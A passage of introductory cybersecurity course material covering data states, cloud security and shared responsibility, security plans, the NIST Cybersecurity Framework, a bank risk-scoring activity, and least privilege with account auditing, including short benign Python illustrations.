transit is data traveling from one point to another. While you're signed into your account, a message
from one of your friends appears. They sent you an interesting article about the growing security
industry. You decide to reply, thanking them for sending this to you. When you click send, this is
now an example of data in transit. Finally, there's data at rest. Data at rest is data not currently being
accessed. In this state, data is typically stored on a physical device. An example of data at rest would
be when you finish checking your email and close your laptop. You then decide to pack up and go to
a nearby cafe for breakfast. As you make your way from the park towards the cafe, the data in your
laptop is at rest. So now that we understand these states of data, let's connect this back to asset
management. Earlier, I mentioned that information is one of the most valuable assets that
companies can have. Information security, or InfoSec, is the practice of keeping data in all states
away from unauthorized users. Weak information security is a serious problem. It can lead to things
like identity theft, financial loss, and reputational damage. These events have potential to harm
organizations, their partners, and their customers. And there's more to consider in your work as a
security analyst. As our digital world continually changes, we are adapting our understanding of
data at rest. Physical devices like our smartphones more commonly store data in the cloud,
meaning that our information isn't necessarily at rest just because our phone is resting on a table.
We should always be mindful of new vulnerabilities as our world becomes increasingly connected.
Remember, protecting data depends on where the data is and what it's doing. Keeping track of
information is part of the puzzle that companies solve when considering their security plan.
Understanding the three states of data enables security teams to analyze risk and determine an asset
management plan for different situations.
The emergence of cloud security
One of the most significant technology developments this century has been the emergence of cloud
computing. The United Kingdom's National Cyber Security Centre defines cloud computing as, “An on-demand, massively scalable service, hosted on shared infrastructure, accessible via the internet.”
Earlier, you learned that most information is in the form of data, which is in a constant state of change.
In recent years, businesses started moving their data to the cloud. The adoption of cloud-based services
has complicated how information is kept safe online. In this reading, you’ll learn about these challenges
and the opportunities they’ve created for security professionals.
Soaring into the cloud
Starting an online business used to be a complicated and costly process. In years past, companies had to
build and maintain their own internal solutions to operate in the digital marketplace. Now, it’s much
easier for anyone to participate because of the cloud.
The availability of cloud technologies has drastically changed how businesses operate online. These new
tools allow companies to scale and adapt quickly while also lowering their costs. Despite these benefits,
the shift to cloud-based services has also introduced a range of new cybersecurity challenges that put
assets at risk.
Cloud-based services
The term cloud-based services refers to a variety of on-demand or web-based business solutions.
Depending on a company’s needs and budget, services can range from website hosting, to application
development environments, to entire back-end infrastructure.
There are three main categories of cloud-based services:
● Software as a service (SaaS)
● Platform as a service (PaaS)
● Infrastructure as a service (IaaS)
Software as a service (SaaS)
SaaS refers to front-end applications that users access via a web browser. The service providers host,
manage, and maintain all of the back-end systems for those applications. Common examples of SaaS
services include applications like Gmail™ email service, Slack, and Zoom software.
Platform as a service (PaaS)
PaaS refers to back-end application development tools that clients can access online. Developers use
these resources to write code and build, manage, and deploy their own apps. Meanwhile, the cloud
service providers host and maintain the back-end hardware and software that the apps use to operate.
Some examples of PaaS services include Google App Engine™ platform, Heroku®, and VMware Cloud
Foundry.
Infrastructure as a service (IaaS)
IaaS customers are given remote access to a range of back-end systems that are hosted by the cloud
service provider. This includes data processing servers, storage, networking resources, and more.
Resources are commonly licensed as needed, making it a cost-effective alternative to buying and
maintaining on-premises infrastructure.
Cloud-based services allow companies to connect with their customers, employees, and business
partners over the internet. Some of the largest organizations in the world offer cloud-based services:
● Google Cloud Platform
● Microsoft Azure
Cloud security
Shifting applications and infrastructure over to the cloud can make it easier to operate an online
business. It can also complicate keeping data private and safe. Cloud security is a growing subfield of
cybersecurity that specifically focuses on the protection of data, applications, and infrastructure in the
cloud.
In a traditional model, organizations had their entire IT infrastructure on premises. Protecting those
systems was entirely up to the internal security team in that environment. These responsibilities are not
so clearly defined when part or all of an operational environment is in the cloud.
For example, a PaaS client pays to access the resources they need to build their applications. So, it is
reasonable to expect them to be responsible for securing the apps they build. On the other hand, the
responsibility for maintaining the security of the servers they are accessing should belong to the cloud
service provider because there are other clients using the same systems.
In cloud security, this concept is known as the shared responsibility model. Clients are commonly
responsible for securing anything that is directly within their control:
● Identity and access management
● Resource configuration
● Data handling
Note: The amount of responsibility that is delegated to a service provider varies depending on the
service being used: SaaS, PaaS, and IaaS.
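The note above can be made concrete with a small lookup table. This is an illustrative sketch only: the task names and the exact split of duties below are assumptions for demonstration, and the real division of responsibility varies by provider and contract.

```python
# Illustrative sketch of the shared responsibility model.
# The task names and the exact client/provider split are assumptions
# for demonstration, not an official mapping from any provider.

CLIENT_RESPONSIBILITIES = {
    "SaaS": {"identity and access management", "data handling"},
    "PaaS": {"identity and access management", "data handling",
             "resource configuration", "application security"},
    "IaaS": {"identity and access management", "data handling",
             "resource configuration", "application security",
             "operating system patching"},
}

def responsible_party(service_model: str, task: str) -> str:
    """Return who secures a given task under a given service model."""
    client_tasks = CLIENT_RESPONSIBILITIES[service_model]
    return "client" if task in client_tasks else "cloud provider"

print(responsible_party("PaaS", "application security"))      # client
print(responsible_party("SaaS", "operating system patching")) # cloud provider
```

Notice that the client's share of responsibility grows from SaaS to IaaS, which matches the note: the more infrastructure a client controls, the more of it they must secure.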
Cloud security challenges
All service providers do their best to deliver secure products to their customers. Much of their success
depends on preventing breaches and how well they can protect sensitive information. However, since
data is stored in the cloud and accessed over the internet, several challenges arise:
● Misconfiguration is one of the biggest concerns. Customers of cloud-based services are
responsible for configuring their own security environment. Oftentimes, they use out-of-the-box
configurations that fail to address their specific security objectives.
● Cloud-native breaches are more likely to occur due to misconfigured services.
● Monitoring access might be difficult depending on the client and level of service.
● Meeting regulatory standards is also a concern, particularly in industries that are required by
law to follow specific requirements such as HIPAA, PCI DSS, and GDPR.
Many other challenges exist besides these. As more businesses adopt cloud-based services, there’s a
growing need for cloud security professionals to meet a growing number of risks. Burning Glass, a
leading labor market analytics firm, ranks cloud security among the most in-demand skills in
cybersecurity.
Key takeaways
So much of the global marketplace has shifted to cloud-based services. Cloud technology is still new,
resulting in the emergence of new security models and a range of security challenges. And it’s likely that
other concerns might arise as more businesses become reliant on the cloud. Being familiar with the
cloud and the different services that are available is an important step towards supporting any
organization’s efforts to protect information online.
Resources for more information
Cloud security is one of the fastest growing subfields of cybersecurity. There are a variety of resources
available online to learn more about this specialized topic.
● The U.K.’s National Cyber Security Centre has a detailed guide for choosing, using, and deploying
cloud services securely based on the shared responsibility model.
● The Cloud Security Alliance® is an organization dedicated to creating secure cloud
environments. They offer access to cloud security-specific research, certification, and products
to users with a paid membership.
● CompTIA Cloud+ is a certificate program designed to teach you the foundational skills needed
to become a cloud security specialist.
Elements of a Security Plan
Security is all about people, processes, and technology. It's a team effort, and
I mean that literally. Protecting assets extends well beyond one person or a group of people in an IT
department. The truth of the matter is that security is a culture. It's a shared set of values that spans
all levels of an organization. These values touch everyone, from
employees, to vendors, to customers. Protecting digital and physical assets
requires everyone to participate, which can be a challenge. That's what security plans are for! Plans
come in many shapes and sizes, but they all share a common goal: to be prepared for risks when
they happen. Placing the focus on people is what leads to the most effective security plans.
Considering the diverse backgrounds and perspectives of everyone involved ensures that no one is
left out when something goes wrong. We talked earlier about risk as being anything that can impact
the confidentiality, integrity, or availability of an asset. Most security plans address risks by breaking
them down according to categories and factors. Some common risk categories might include the
damage, disclosure, or loss of information. Any of these
can be due to factors like the physical damage or malfunctions of a device. There are also factors
like attacks and human error. For example, a new school teacher may be asked to sign a contract
before their first day of class. The agreement may warn against some common risks associated with
human error, like using a personal email to send sensitive information. A security plan may require
that all new hires sign off on this agreement, effectively spreading the values that ensure everyone's
in alignment. This is just one example of the types and causes of risk that a plan might address.
These things vary widely depending on the company. But how these plans are communicated is
similar across industries. Security plans consist of three basic elements: policies, standards, and
procedures. These three elements are how companies share their security plans. These words tend
to be used interchangeably outside of security, but you'll soon discover that they each have a very
specific meaning and function in this context. A policy in security is a set of rules that reduce risk and
protects information. Policies are the foundation of every security plan. They give everyone in and
out of an organization guidance by addressing questions like, what are we protecting and why?
Policies focus on the strategic side of things by identifying the scope, objectives, and limitations of a
security plan. For instance, newly hired employees at many companies are required to sign off on
an acceptable use policy, or AUP. These provisions outline secure ways that an employee may access
corporate systems. Standards are the next part. These have a tactical function, as they concern how
well we're protecting assets. In security, standards are references that inform how to set policies. A
good way to think of standards is that they create a point of reference. For example, many
companies use the password management standard identified in NIST Special Publication 800-63B
to improve their security policies by specifying that employees' passwords must be at least eight
characters long. The last part of a plan is its procedures. Procedures are step-by-step instructions to
perform a specific security task. Organizations usually keep multiple procedure documents that are
used throughout the company, like how employees can choose secure passwords, or how they can
securely reset a password if it's been locked. Sharing clear and actionable procedures with
everyone creates accountability, consistency, and efficiency across an organization. Policies,
standards, and procedures vary widely from one company to another because they are tailored to
each organization's goals. Simply understanding the structure
of security plans is a great start. For now, I hope you have a clearer picture of what policies,
standards, and procedures are, and how they are essential to making security a team effort.
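The password standard mentioned above, a minimum length drawn from NIST Special Publication 800-63B, could be enforced by a procedure as simple as the following check. This is a minimal sketch covering only the eight-character minimum cited in the text; the full publication contains many more recommendations (such as screening against known-compromised passwords) that are not shown here.

```python
def meets_length_standard(password: str, minimum: int = 8) -> bool:
    """Check a password against the minimum-length rule cited from
    NIST SP 800-63B: at least eight characters. Only the length rule
    from the text is checked; this is not a full 800-63B validator."""
    return len(password) >= minimum

print(meets_length_standard("hunter2"))      # False (7 characters)
print(meets_length_standard("correcthorse")) # True
```

This is a good example of how the three elements connect: the standard (800-63B) informs the policy (passwords must be at least eight characters), and the procedure is the concrete step that enforces it.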
The NIST Cybersecurity Framework
Having a plan is just one part of securing assets. Once the plan is in action, the other
part is making sure everyone's following along. In security, we call this compliance. Compliance is
the process of adhering to internal standards and external regulations. Small companies and large
organizations around the world place security compliance at the top of their list of priorities. At a
high-level, maintaining trust, reputation, safety, and the integrity of your data are just a few reasons
to be concerned about compliance. Fines, penalties, and
lawsuits are other reasons. This is particularly true for companies in highly regulated industries,
like health care, energy, and finance. Being out of compliance with a regulation can cause long
lasting financial and reputational effects that can seriously impact a business. Regulations are rules
set by a government or other authority to control the way something is done. Like policies,
regulations exist to protect people and their information, but on a larger scale. Compliance can be a
complex process because of the many regulations that exist all around the world. For our purpose,
we're going to focus on a framework of security compliance, the U.S.-based NIST Cybersecurity
Framework. Earlier in the program, you learned about the National Institute of Standards and Technology,
or NIST. One of the primary roles of NIST is to openly provide companies with a set of frameworks
and security standards that reflect key security related regulations. The NIST Cybersecurity
Framework is a voluntary framework that consists of standards, guidelines, and best practices to
manage cybersecurity risk. Commonly known as the CSF, this framework was developed to help
businesses secure one of their most important assets, information. The CSF consists of three main
components: the core, its tiers, and its profiles. Let's explore each of these together to build a better
understanding of how NIST's CSF is used. The core is basically a simplified version of the functions,
or duties, of a security plan. The CSF core identifies five broad functions: identify, protect, detect,
respond, and recover. Think of these categories of the core as a security checklist. After the core, the
next NIST component we'll discuss is its tiers. These provide security teams with a way to measure
performance across each of the five functions of the core. Tiers range from Level-1 to Level-4.
Level-1, or partial, indicates a function is reaching bare minimum standards. Level-4, or adaptive, is an
indication that a function is being performed at an exemplary standard. You may have noticed that
CSF tiers aren't a yes or no proposition; instead, there's a range of values. That's because tiers are
designed as a way of showing organizations what is and isn't working with their security plans.
Lastly, profiles are the final component of CSF. These provide insight into the current state of a
security plan. One way to think of profiles is like photos capturing a moment in time. Comparing
photos of the same
subject taken at different times can provide useful insights. For example, without these photos, you
might not notice how this tree has changed. It's the same with NIST profiles. Good security practice
is about more than avoiding fines and attacks. It demonstrates that you care about people and their
information. Before we go, let's visit the core's functions one more time to look at where we've been
and where we're going. The first function is identify. Our previous discussions on asset management
and risk assessment relate to that function. Coming up, we're going to focus on many of the
categories of the second function, the protect function.
Security guidelines in action
Organizations often face an overwhelming amount of risk. Developing a security plan from the beginning
that addresses all risk can be challenging. This makes security frameworks a useful option.
Previously, you learned about the NIST Cybersecurity Framework (CSF). A major benefit of the CSF is
that it's flexible and can be applied to any industry. In this reading, you’ll explore how the NIST CSF can
be implemented.
Origins of the framework
Originally released in 2014, NIST developed the Cybersecurity Framework to protect critical
infrastructure in the United States. NIST was selected to develop the CSF because they are an unbiased
source of scientific data and practices. NIST eventually adapted the CSF to fit the needs of businesses in
the public and private sector. Their goal was to make the framework more flexible, making it easier to
adopt for small businesses or anyone else that might lack the resources to develop their own security
plans.
Components of the CSF
As you might recall, the framework consists of three main components: the core, tiers, and profiles. In
the following sections, you'll learn more about each of these CSF components.
Core
The CSF core is a set of desired cybersecurity outcomes that help organizations customize their security
plan. It consists of five functions, or parts: Identify, Protect, Detect, Respond, and Recover. These functions
are commonly used as an informative reference to help organizations identify their most important assets
and protect those assets with appropriate safeguards. The CSF core is also used to understand ways to
detect attacks and develop response and recovery plans should an attack happen.
Tiers
The CSF tiers are a way of measuring the sophistication of an organization's cybersecurity program. CSF
tiers are measured on a scale of 1 to 4. Tier 1 is the lowest score, indicating that a limited set of security
controls has been implemented. Overall, CSF tiers are used to assess an organization's security posture
and identify areas for improvement.
Profiles
The CSF profiles are pre-made templates of the NIST CSF that are developed by a team of industry
experts. CSF profiles are tailored to address the specific risks of an organization or industry. They are
used to help organizations develop a baseline for their cybersecurity plans, or as a way of comparing
their current cybersecurity posture to a specific industry standard.
Note: The core, tiers, and profiles were each designed to help any business improve their security
operations. Although there are only three components, the entire framework consists of a complex
system of subcategories and processes.
Implementing the CSF
As you might recall, compliance is an important concept in security. Compliance is the process of
adhering to internal standards and external regulations. In other words, compliance is a way of
measuring how well an organization is protecting their assets. The NIST Cybersecurity Framework (CSF)
is a voluntary framework that consists of standards, guidelines, and best practices to manage
cybersecurity risk. Organizations may choose to use the CSF to achieve compliance with a variety of
regulations.
Note: Regulations are rules that must be followed, while frameworks are resources you can choose to
use.
Since its creation, many businesses have used the NIST CSF. However, CSF can be a challenge to
implement due to its high level of detail. It can also be tough to find where the framework fits in. For
example, some businesses have established security plans, making it unclear how CSF can benefit them.
Alternatively, some businesses might be in the early stages of building their plans and need a place to
start.
In any scenario, the U.S. Cybersecurity and Infrastructure Security Agency (CISA) provides detailed
guidance that any organization can use to implement the CSF. This is a quick overview and summary of
their recommendations:
● Create a current profile of the security operations and outline the specific needs of your
business.
● Perform a risk assessment to identify which of your current operations are meeting business and
regulatory standards.
● Analyze and prioritize existing gaps in security operations that place the business's assets at
risk.
● Implement a plan of action to achieve your organization’s goals and objectives.
Pro tip: Always consider current risk, threat, and vulnerability trends when using the NIST
CSF.
You can learn more about implementing the CSF in this report by CISA that outlines how the framework
was applied in the commercial facilities sector.
Industries embracing the CSF
The NIST CSF has continued to evolve since its introduction in 2014. Its design is influenced by the
standards and best practices of some of the largest companies in the world.
A benefit of the framework is that it aligns with the security practices of many organizations across the
global economy. It also helps with regulatory compliance that might be shared by business partners.
Key takeaways
The NIST CSF is a flexible resource that organizations may choose to use to assess and improve their
security posture. It's a useful framework that combines the security best practices of industries around
the world. Implementing the CSF can be a challenge for any organization. The CSF can help businesses
meet regulatory compliance requirements to avoid financial and reputational risks.
Activity: Score risks based on their likelihood and severity
Activity Overview
In this activity, you will practice performing a risk assessment by evaluating vulnerabilities
that commonly threaten business operations. Then, you will decide how to prioritize your
resources based on the risk scores you assign each vulnerability.
You might recall that the purpose of having a security plan is to be prepared for risks.
Assessing potential risks is one of the first steps of the NIST Cybersecurity Framework
(CSF), a voluntary framework that consists of standards, guidelines, and best practices to
manage cybersecurity risk. Risk assessments are how security teams determine whether
their security operations are adequately positioned to prevent cyber attacks and protect
sensitive information.
Be sure to complete this activity before moving on. The next course item will provide you
with a completed exemplar to compare to your own work.
Scenario
Review the following scenario. Then complete the step-by-step instructions.
You've joined a new cybersecurity team at a commercial bank. The team is conducting a
risk assessment of the bank's current operational environment. As part of the assessment,
they are creating a risk register to help them focus on securing the most vulnerable risks.
A risk register is a central record of potential risks to an organization's assets, information
systems, and data. Security teams commonly use risk registers when conducting a risk
assessment.
Your supervisor asks you to evaluate a set of risks that the cybersecurity team has recorded
in the risk register. For each risk, you will first determine how likely that risk is to occur.
Then, you will determine how severely that risk may impact the bank. Finally, you will
calculate a score for the severity of that risk. You will then compare scores across all risks
so your team can determine how to prioritize their attention for each risk.
Step 1: Access the template
Link to template: Risk register
Step 2: Understand the operating environment
When conducting a risk assessment, it's important to consider the factors that could cause
a security event. This often starts with understanding the operating environment.
In this scenario, your team has identified characteristics of the operating environment that
could factor into the bank's risk profile:
The bank is located in a coastal area with low crime rates. Many people and systems handle
the bank's data—100 on-premise employees and 20 remote employees. The customer base
of the bank includes 2,000 individual accounts and 200 commercial accounts. The bank's
services are marketed by a professional sports team and ten local businesses in the
community. There are strict financial regulations that require the bank to secure their data
and funds, like having enough cash available each day to meet Federal Reserve
requirements.
Step 3: Consider potential risks to assets
Security events are possible when assets are at risk. The source of a risk can range from
malicious attackers to accidental human errors. A risk source can even come from natural
or environmental hazards, such as a structural failure or power outage.
The bank's funds are one of its key assets. Your team has listed five primary risks to the
bank's funds:
● Business email compromise
● Compromised user database
● Financial records leak
● Theft
● Supply chain attack
Consider these potential risks in relation to the bank's operating environment. Then, write
2-3 sentences (40-60 words) in the Notes area of the template describing how security
events are possible considering the risks facing the funds in this operating environment.
Step 4: Score risks based on their likelihood
As you might recall, risk can be calculated with this simple formula:
Likelihood x Impact = Risk
To calculate the score for a security risk, you must first estimate and score the likelihood of
the risk causing a security event. The likelihood of a risk can be based on available
evidence, prior experience, or expert judgment. A common way to estimate the likelihood
of the risk is to determine the potential frequency of the risk occurring:
● Could the risk happen once a day?
● Could the risk happen once a month?
● Could the risk happen once in a year?
For example, the bank must have enough funds available each day to meet its legal
requirements. A potential risk that could prevent the bank from replenishing its funds is a
supply chain disruption. Being in a coastal area, there's a likelihood that the bank may
experience supply chain disruptions caused by hurricanes. However, a hurricane might
only impact the bank every few years, so you can score the likelihood as low.
In this instance, the team is scoring the likelihood of an event on a scale of 1-3:
● 1 represents an event with a low chance of occurring.
● 2 represents an event with a moderate chance of occurring.
● 3 represents an event with a high chance of occurring.
Review the Risk(s), Description, and Notes of the risk register template. Refer to the risk
matrix and use it to estimate a likelihood score for each risk. Then, enter a score (1-3) for
each risk in the Likelihood column of the register.
Step 5: Score risks based on their severity
A severity score is an estimate of the overall impact that might occur as a result of an event.
For example, damage can occur to a company's reputation or finances and there may be a
loss of data, customers, or assets. Evaluating the severity of a risk helps businesses
determine the level of risk they can tolerate and how assets might be affected.
When evaluating the severity of a risk, consider the potential consequences of that risk
occurring:
● How would the business be affected?
● What's the financial harm to the business and its customers?
● Can important operations or services be impacted?
● Are there regulations that can be violated?
● What is the reputational damage to the company's standing?
Use the top row of the risk matrix and consider the potential impact of each risk. Estimate a
severity score for each risk. Then, enter a score (1-3) for each risk in the Severity column of
the register:
● 1 (low severity)
● 2 (moderate severity)
● 3 (high severity)
For example, a leak of financial records might lead to a loss of profits, a loss of customers,
and heavy regulatory fines. A risk such as this might receive a severity score of 3 because it
greatly impacts the bank's ability to operate.
Step 6: Calculate an overall risk score
Ultimately, the goal of performing a risk assessment is to help security teams prioritize
their efforts and resources.
Using the risk formula, multiply the likelihood and severity score for each risk. Then, enter
a priority score (1-9) for each of the risks in the Priority column of the register.
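Steps 4 through 6 can be sketched in a few lines. The register entries and scores below are hypothetical examples chosen for illustration, not answers to the activity.

```python
# Hypothetical risk register entries: (risk, likelihood 1-3, severity 1-3).
# These scores are examples only, not the activity's answers.
register = [
    ("Business email compromise", 2, 2),
    ("Financial records leak",    3, 3),
    ("Supply chain attack",       1, 3),
]

# Likelihood x Impact = Risk: priority scores range from 1 to 9.
scored = [(risk, likelihood * severity)
          for risk, likelihood, severity in register]

# Sort highest priority first so the team knows where to focus.
for risk, priority in sorted(scored, key=lambda r: r[1], reverse=True):
    print(f"{risk}: {priority}")
```

Running this puts the financial records leak (3 × 3 = 9) at the top of the list, ahead of business email compromise (4) and the supply chain attack (3), which mirrors how the completed register prioritizes attention.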
What to Include in Your Response
Be sure to address the following criteria in your completed activity:
● 2-3 sentences describing the risk factors
● 5 likelihood scores
● 5 severity scores
● 5 overall risk scores
Assessment of Exemplar
Compare the exemplar to your completed activity. Review your work using each of the
criteria in the exemplar. What did you do well? Where can you improve? Use your answers
to these questions to guide you as you continue to progress through the course.
Note: The exemplar represents one possible way to complete the activity. Yours will likely
differ in certain ways. What’s important is that you've considered how likelihood and
impact affect how organizations approach risk management.
Next, you can review the results of a completed risk register:
Notes
Some risk factors to consider might have been the number of other companies that
interact with the bank. These sources of risk might introduce incidents beyond the bank's
control. Also, the risk of theft is important to consider because of the number of customers
and the operational impact it could have on the business.
Likelihood
A range of likelihood scores were estimated based on factors that could lead to a security
incident. Each risk was scored as a 1, 2, or 3 on a risk matrix, meaning the chances of
occurring were rare, likely, or certain. A supply chain attack caused by natural disaster was
scored with a 1, meaning it was regarded as unlikely due to the unpredictability of those
events. On the other hand, compromised data events were scored a 2 because they are
likely to occur given the possible causes.
Severity
No risk received a severity score less than 2 because risks that involve data breaches such
as business email compromise, can have serious consequences. Customers at a bank trust
the businesses to protect their money and personal information. Also, the bank's
operations could be terminated if they fail to comply with regulations.
Priority
A financial records leak received the highest overall risk score of 9. This indicates that this
risk is almost certain to happen and would greatly impact the bank's ability to operate.
Such a high overall score signals the security team to prioritize remediating, or resolving,
any issues related to that risk before moving on to risks that scored lower.
Key takeaways
Risk assessments are useful for identifying risks to an organization’s information, networks
and systems. Security plans can benefit from regular risk assessments as a way of
highlighting important concerns that should be addressed. Additionally, these assessments
help keep track of any changes that can occur in an organization's operating environment.
Glossary terms from module 1
Terms and definitions from Course 5, Module 1
Asset: An item perceived as having value to an organization
Asset classification: The practice of labeling assets based on sensitivity and importance to an
organization
Asset inventory: A catalog of assets that need to be protected
Asset management: The process of tracking assets and the risks that affect them
Compliance: The process of adhering to internal standards and external regulations
Data: Information that is translated, processed, or stored by a computer
Data at rest: Data not currently being accessed
Data in transit: Data traveling from one point to another
Data in use: Data being accessed by one or more users
Information security (InfoSec): The practice of keeping data in all states away from unauthorized users
National Institute of Standards and Technology (NIST) Cybersecurity Framework (CSF): A voluntary
framework that consists of standards, guidelines, and best practices to manage cybersecurity risk
Policy: A set of rules that reduce risk and protect information
Procedures: Step-by-step instructions to perform a specific security task
Regulations: Rules set by a government or other authority to control the way something is done
Risk: Anything that can impact confidentiality, integrity, or availability of an asset
Standards: References that inform how to set policies
Threat: Any circumstance or event that can negatively impact assets
Vulnerability: A weakness that can be exploited by a threat
Module 2 – Security Controls
These days, information is in so many places at once. As a result, organizations are under
a lot of pressure to implement effective security controls that protect everyone's
information from being stolen or exposed. Security controls are safeguards designed
to reduce specific security risks. They include a wide range of tools that
protect assets before, during, and after an event. Security controls can be
organized into three types: technical, operational, and managerial. Technical control types include the
many technologies used to protect assets. This includes encryption, authentication systems, and
others. Operational controls relate to maintaining the day-to-day security environment. Generally,
people perform these controls like awareness training and incident response. Managerial controls are
centered around how the other two reduce risk. Examples of management controls include policies,
standards, and procedures. Typically, an organization's security policy outlines the controls needed
to achieve their goals. Information privacy plays a key role in these decisions. Information privacy
is the protection of data from unauthorized access and distribution. Information privacy is
about the right to choose. People and organizations alike deserve the right to decide when, how,
and to what extent private information about them is shared. Security controls are the technologies
used to regulate information privacy. For example, imagine using
a travel app to book a flight. You might browse through a list of flights and find one at a good price.
To reserve a seat, you enter some personal information, like your name, email, and credit card
number for payment. The transaction goes through successfully, and you booked your flight. Now,
you reasonably expect the airline company to access this information you enter when signing up to
complete the reservation. However, should everyone at the company
have access to your information? A person working in the marketing department shouldn't need
access to your credit card information. It makes sense to share that information with a customer
support agent. Except, they should only need to access it while helping with your reservation. To
maintain privacy, security controls are intended to limit access based on the user and situation. This
is known as the principle of least privilege. Security controls should be designed with the principle
of least privilege in mind. When they are, they rely on
differentiating between data owners and data custodians. A data owner is a person who decides who
can access, edit, use, or destroy their information. The idea is very straightforward except in cases
where there are multiple owners. For example, the intellectual property of an organization can have
multiple data owners. A data custodian is anyone or anything that's responsible for the safe handling,
transport, and storage of information. Did you notice that I mentioned "anything"? That's because,
aside from people, organizations and their systems are also custodians of people's information.
There are other considerations besides these when implementing security controls. Remember that
data is an asset. Like any other asset, information privacy requires proper classification and
handling. As we progress in this section, we'll continue exploring other security controls that make
this possible.
Principle of least privilege
Security controls are essential to keeping sensitive data private and safe. One of the most common
controls is the principle of least privilege, also referred to as PoLP or least privilege. The principle of
least privilege is a security concept in which a user is only granted the minimum level of access and
authorization required to complete a task or function.
Least privilege is a fundamental security control that supports the confidentiality, integrity, and
availability (CIA) triad of information. In this reading, you'll learn how the principle of least privilege
reduces risk, how it's commonly implemented, and why it should be routinely audited.
Limiting access reduces risk
Every business needs to plan for the risk of data theft, misuse, or abuse. Implementing the principle of
least privilege can greatly reduce the risk of costly incidents like data breaches by:
● Limiting access to sensitive information
● Reducing the chances of accidental data modification, tampering, or loss
● Supporting system monitoring and administration
Least privilege greatly reduces the likelihood of a successful attack by connecting specific resources to
specific users and placing limits on what they can do. It's an important security control that should be
applied to any asset. Clearly defining who or what your users are is usually the first step of
implementing least privilege effectively.
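The idea of connecting specific resources to specific users can be sketched in a few lines of Python. This is a hypothetical illustration; the role names and permission strings are invented for the example:

```python
# Hypothetical sketch of least privilege: each role is granted only the
# permissions it needs, and anything not explicitly granted is denied.
ROLE_PERMISSIONS = {
    "customer_support": {"read_reservation"},
    "marketing": {"read_campaign_stats"},
    "billing": {"read_reservation", "read_payment_info"},
}

def is_allowed(role: str, action: str) -> bool:
    """Allow an action only if the user's role explicitly grants it."""
    return action in ROLE_PERMISSIONS.get(role, set())

# A marketing employee cannot read payment information, but billing can.
print(is_allowed("marketing", "read_payment_info"))  # False
print(is_allowed("billing", "read_payment_info"))    # True
```

Note the default-deny behavior: an unknown role or an unlisted action returns `False`, which mirrors granting only the minimum access required.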
Note: Least privilege is closely related to another fundamental security principle, the separation of
duties—a security concept that divides tasks and responsibilities among different users to prevent
giving a single user complete control over critical business functions. You'll learn more about separation
of duties in a different reading about identity and access management.
Determining access and authorization
To implement least privilege, access and authorization must be determined first. There are two
questions to ask to do so:
● Who is the user?
● How much access do they need to a specific resource?
Determining who the user is tends to be straightforward. A user can refer to a person, like a customer, an
employee, or a vendor. It can also refer to a device or software that's connected to your business
network. In general, every user should have their own account. Accounts are typically stored and
managed within an organization's directory service.
These are the most common types of user accounts:
● Guest accounts are provided to external users who need to access an internal network, like
customers, clients, contractors, or business partners.
● User accounts are assigned to staff based on their job duties.
● Service accounts are granted to applications or software that needs to interact with other
software on the network.
● Privileged accounts have elevated permissions or administrative access.
It's best practice to determine a baseline access level for each account type before implementing least
privilege. However, the appropriate access level can change from one moment to the next. For example,
a customer support representative should only have access to your information while they are helping
you. Your data should then become inaccessible when the support agent starts working with another
customer and they are no longer actively assisting you. Least privilege can only reduce risk if user
accounts are routinely and consistently monitored.
Pro tip: Passwords play an important role when implementing the principle of least privilege. Even if
user accounts are assigned appropriately, an insecure password can compromise your systems.
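The customer support scenario above can be pictured as a time-limited access grant that expires when the session ends. This is a hypothetical sketch, not a real directory-service API:

```python
import time

# Hypothetical sketch: access that automatically expires after a set time,
# so a support agent only holds access while actively assisting a customer.
class AccessGrant:
    def __init__(self, user: str, resource: str, ttl_seconds: float):
        self.user = user
        self.resource = resource
        # Record when the grant stops being valid.
        self.expires_at = time.monotonic() + ttl_seconds

    def is_active(self) -> bool:
        """The grant is only valid until its expiration time."""
        return time.monotonic() < self.expires_at

grant = AccessGrant("support_agent_1", "customer_record_42", ttl_seconds=0.1)
print(grant.is_active())  # True while the session is open
time.sleep(0.2)
print(grant.is_active())  # False once the grant expires
```

In practice, directory services and identity providers implement expiration and revocation for you; the point of the sketch is that access should be scoped to the situation, not granted permanently.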
Auditing account privileges
Setting up the right user accounts and assigning them the appropriate privileges is a helpful first step.
Periodically auditing those accounts is a key part of keeping your company’s systems secure.
There are three common approaches to auditing user accounts:
● Usage audits
● Privilege audits
● Account change audits
As a security professional, you might be involved with any of these processes.
Usage audits
When conducting a usage audit, the security team will review which resources each account is accessing
and what the user is doing with the resource. Usage audits can help determine whether users are acting
in accordance with an organization’s security policies. They can also help identify whether a user has
permissions that can be revoked because they are no longer being used.
Privilege audits
Users tend to accumulate more access privileges than they need over time, an issue known as privilege
creep. This might occur if an employee receives a promotion or switches teams and their job duties
change. Privilege audits assess whether a user's role is in alignment with the resources they have access
to.
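A privilege audit can be pictured as a comparison between the privileges a user actually holds and the baseline for their role. The role and privilege names below are invented for illustration:

```python
# Hypothetical sketch: flag privileges that exceed a role's baseline,
# which is the signature of privilege creep.
ROLE_BASELINE = {
    "sales": {"read_leads", "edit_leads"},
    "engineer": {"read_code", "deploy"},
}

def audit_privileges(role: str, granted: set) -> set:
    """Return privileges a user holds beyond their role's baseline."""
    return granted - ROLE_BASELINE.get(role, set())

# An employee who moved from engineering to sales kept an old permission.
extra = audit_privileges("sales", {"read_leads", "edit_leads", "deploy"})
print(extra)  # {'deploy'} is a candidate for revocation
```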
Account change audits
Account directory services keep records and logs associated with each user. Changes to an account are
usually saved and can be used to audit the directory for suspicious activity, like multiple attempts to
change an account password. Performing account change audits helps to ensure that all account changes
are made by authorized users.
Note: Most directory services can be configured to alert system administrators of suspicious activity.
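Scanning an account change log for repeated password-change attempts might look something like this sketch; the log format and the alert threshold are assumptions, not any real directory service's schema:

```python
from collections import Counter

# Hypothetical account change log: (user, event) pairs.
change_log = [
    ("alice", "password_change_attempt"),
    ("bob", "email_update"),
    ("alice", "password_change_attempt"),
    ("alice", "password_change_attempt"),
]

def flag_suspicious(log, threshold=3):
    """Flag accounts whose password-change attempts meet the threshold."""
    attempts = Counter(user for user, event in log
                       if event == "password_change_attempt")
    return [user for user, count in attempts.items() if count >= threshold]

print(flag_suspicious(change_log))  # ['alice']
```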
Key takeaways
The principle of least privilege is a security control that can reduce the risk of unauthorized access to
sensitive information and resources. Setting up and configuring user accounts with the right levels of
access and authorization is an important step toward implementing least privilege. Auditing user
accounts and revoking unnecessary access rights is an important practice that helps to maintain the
confidentiality, integrity, and availability of information.
The data lifecycle
Organizations of all sizes handle a large amount of data that must be kept private. You learned that data
